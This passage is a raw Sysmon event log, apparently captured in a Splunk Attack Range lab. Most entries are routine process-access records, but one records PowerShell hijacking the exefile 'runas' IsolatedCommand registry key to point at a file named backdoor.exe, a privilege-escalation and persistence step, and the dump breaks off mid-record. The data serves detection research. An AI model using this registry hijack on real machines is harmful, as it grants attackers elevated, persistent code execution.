08:10:26.342{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810854Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.342{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810853Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.342{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810852Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.342{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810851Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.342{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810850Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.342{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810849Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.342{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810848Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.342{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F8F2-60EB-F479-00000000D001}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810847Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.342{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F8F2-60EB-F479-00000000D001}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810846Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.327{0C1E0330-F8F2-60EB-F479-00000000D001}896C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001055573Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:27.777{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D9DB6E1F53F8D1D214C5D4D639E0827C,SHA256=866027F77D94D3C230B8210DA8F9583B4648AD6530E83B5241CDDA452275A208,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055572Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:27.360{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C91343BCA0652712331093A64254542C,SHA256=7AD834BD2CC7F4765C1203DC5D03081339C8B1B83F9A34D38F7F4967D82EA37D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055571Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:27.360{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE54ECE28A24A22631FE7549C0D2D234,SHA256=2A0D41D9AF70D89878C02837274CFBC3F7BE4B614658BC3FE56E8969E48AC489,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055570Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:27.360{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A8A00A1462AA97FEA08A3EB09B7EC85C,SHA256=B261C5564D011786C0CFAA16353FC501C32C087218DD0C1380B3E957328F7612,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001055569Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:10:27.307{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112_Classes\exefile\shell\runas\command\IsolatedCommandc:\temp\test\backdoor.exe 354300x80000000000000001055568Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:18.724{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62009-false10.0.1.12-8000- 23542300x8000000000000000810890Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:27.935{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A7225B66C33C26AFC317B5DCC2694396,SHA256=24D6D70A2A1969490D129248002AA766FDDCBAF775853FC1BAE3383202640535,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810889Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:27.795{0C1E0330-F8F3-60EB-F679-00000000D001}3548136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810888Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:27.623{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F8F3-60EB-F679-00000000D001}3548C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810887Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:27.623{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810886Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:27.623{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810885Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:27.623{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810884Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:27.623{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810883Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:27.623{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810882Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:27.623{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810881Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:27.623{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810880Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:27.623{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810879Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:27.623{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810878Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:27.623{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F8F3-60EB-F679-00000000D001}3548C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810877Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:27.623{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F8F3-60EB-F679-00000000D001}3548C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810876Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 